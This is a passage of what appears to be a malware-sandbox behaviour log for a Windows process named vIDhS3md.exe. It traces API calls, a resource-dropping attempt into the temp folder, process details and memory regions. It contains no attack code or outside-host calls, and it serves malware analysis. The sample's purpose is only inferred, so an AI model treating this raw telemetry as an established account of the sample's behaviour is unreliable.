lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xb3\x4b\xb6\x4f\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0299.098] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0299.098] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0299.098] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0299.099] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0299.099] GetCurrentProcess () returned 0xffffffff [0299.099] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0299.099] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0299.099] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0299.099] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0299.099] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0299.099] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0299.099] LockResource (hResData=0x43c648) returned 0x43c648 [0299.099] GetCurrentPackageId () returned 0x3d54 [0299.099] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0299.099] GetLastError () returned 0x20 [0299.099] GetLastError () returned 0x20 [0299.099] SetLastError (dwErrCode=0x20) [0299.099] GetLastError () returned 0x20 [0299.099] SetLastError (dwErrCode=0x20) [0299.099] GetLastError () returned 0x20 [0299.100] SetLastError (dwErrCode=0x20) [0299.100] GetLastError () returned 0x20 [0299.100] SetLastError (dwErrCode=0x20) [0299.100] GetLastError () returned 0x20 [0299.100] SetLastError (dwErrCode=0x20) [0299.100] GetLastError () returned 0x20 [0299.100] SetLastError (dwErrCode=0x20) [0299.100] WriteFile (in: hFile=0xc0, lpBuffer=0x19ea00*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e32c, lpOverlapped=0x0 | out: lpBuffer=0x19ea00*, lpNumberOfBytesWritten=0x19e32c*=0x49, lpOverlapped=0x0) returned 1 [0299.101] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0299.101] ExitProcess (uExitCode=0x1) Thread: id = 1012 os_tid = 0xcd8 Process: id = "150" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x5b99f000" os_pid = "0xcbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "142" os_parent_pid = "0xc44" cmd_line = "vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10251 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10252 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10253 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10254 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 10255 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 10256 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 10257 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 10258 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10259 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10260 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 10261 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10262 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10263 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10264 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10265 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10266 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10267 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10268 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10289 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 10290 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10291 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10292 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10293 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10294 start_va = 0x480000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10295 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10296 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10297 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10298 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 10399 start_va = 0x200000 end_va = 0x2bdfff entry_point = 0x200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10400 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10401 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10402 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10403 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 10404 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 10405 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10406 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 10407 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10408 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10409 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10410 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10411 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 10412 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 10413 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 10414 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10415 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10416 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 10417 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 10418 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 10419 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 10420 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 10421 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 10422 start_va = 0x74550000 end_va = 0x745e1fff entry_point = 0x74550000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 10423 start_va = 0x74730000 end_va = 0x74737fff entry_point = 0x74730000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 10424 start_va = 0x480000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10425 start_va = 0x620000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 10426 start_va = 0x480000 end_va = 0x4a9fff entry_point = 0x480000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10427 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 10428 start_va = 0x720000 end_va = 0x8a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 10429 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10430 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10431 start_va = 0x8b0000 end_va = 0xa30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 10432 start_va = 0xa40000 end_va = 0x1e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 10478 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10479 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10480 start_va = 0x480000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Thread: id = 1008 os_tid = 0xcc0 [0299.239] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0299.240] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0299.241] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0299.242] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0299.243] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0299.244] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 